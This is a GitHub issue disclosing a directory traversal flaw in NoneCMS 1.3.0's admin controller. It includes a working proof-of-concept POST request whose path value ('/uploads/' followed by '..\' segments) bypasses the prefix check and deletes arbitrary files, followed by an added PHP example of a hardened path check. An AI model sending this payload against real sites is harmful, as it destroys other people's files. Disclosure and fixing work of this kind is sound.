nangge / noneCms

A content management system based on ThinkPHP 5.1 for quickly building blogs and corporate sites; a real-time chat room has also been added
http://www.5none.com
Other
273 stars 120 forks

The latest patch V1.3.0 of NoneCMS has a directory traversal vulnerability #31

Open ghost opened 4 years ago

ghost commented 4 years ago

The latest patch V1.3.0 of NoneCMS has a directory traversal vulnerability in application/admin/controller/Main.php. The vulnerability allows remote authenticated users to delete arbitrary files by leveraging back-office access to provide a ..\ in the path parameter that starts with /upload/.

In order to fix CVE-2018-6022, the NoneCMS author made the following changes to the file application\admin\controller\Main.php: https://github.com/nangge/noneCms/commit/ff3fc6d03844f1f33109b2bc4ffe3aa5fb4b2038#diff-0eaf9046c434434ca7b2b0d5e0fa0293

We can see that the patching measure is to check whether the path parameter's value starts with '/uploads/'. But we can still bypass it by combining the '/uploads/' prefix with '..\' to carry out a directory traversal attack that can delete arbitrary files.

So the PoC is as follows:

POST /nonecms/public/index.php/admin/main/upload.html HTTP/1.1
Host: 172.23.64.227:88
Content-Length: 93
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.23.64.227:88
Referer: http://172.23.64.227:88/nonecms/public/index.php/admin/flink/edit/id/2/type/2.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: thinkphp_show_page_trace=0|0; thinkphp_show_page_trace=0|0; thinkphp_show_page_trace=0|0; PHPSESSID=bs9k1rlmqt1qd0hsq9etv8co90
Connection: close

act=del&path=/uploads/..\..\..\..\test.txt

Before sending the payload, we create a test.txt in this directory:

When we send the payload, the test.txt file is deleted:
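For comparison, an added example (not NoneCMS code) of why a bare string-prefix check fails and how a path confinement check that canonicalises the path before comparing it closes the gap; `$webRoot` is an assumed absolute document-root path, and the controller usage at the end is hypothetical.

```php
<?php
// Added example, not the project's own code. Assumes $webRoot is the absolute
// document root under which the "uploads" directory lives.

/**
 * Weak check of the kind the issue describes: a literal prefix test only.
 * "/uploads/..\..\..\..\test.txt" passes because it starts with "/uploads/",
 * yet on Windows the backslashes act as separators and escape the directory.
 */
function weakPrefixCheck(string $path): bool
{
    return strpos($path, '/uploads/') === 0;
}

/**
 * Hardened check: normalise separators, reject ".." segments, then resolve the
 * path with realpath() and require the result to sit under the uploads root.
 * Returns the canonical absolute path to delete, or null if it is not allowed.
 */
function resolveUploadPath(string $webRoot, string $path): ?string
{
    // Treat "\" like "/" so "..\" cannot slip past a forward-slash-only check.
    $normalized = str_replace('\\', '/', $path);

    // Refuse any parent-directory segment, however it was written.
    foreach (explode('/', $normalized) as $segment) {
        if ($segment === '..') {
            return null;
        }
    }

    $uploadsRoot = realpath($webRoot . DIRECTORY_SEPARATOR . 'uploads');
    $target = realpath($webRoot . DIRECTORY_SEPARATOR . ltrim($normalized, '/'));
    if ($uploadsRoot === false || $target === false) {
        return null; // uploads root missing, or the target file does not exist
    }

    // Compare canonical paths; the trailing separator stops "/uploads2/..." matching.
    $prefix = $uploadsRoot . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Hypothetical use in the delete branch of the controller:
// $safe = resolveUploadPath($webRoot, input('post.path', ''));
// if ($safe === null) { return json(['code' => 1, 'msg' => 'invalid path']); }
// unlink($safe);
```

With the PoC value from this issue, `weakPrefixCheck()` returns true while `resolveUploadPath()` returns null, so the unlink never runs.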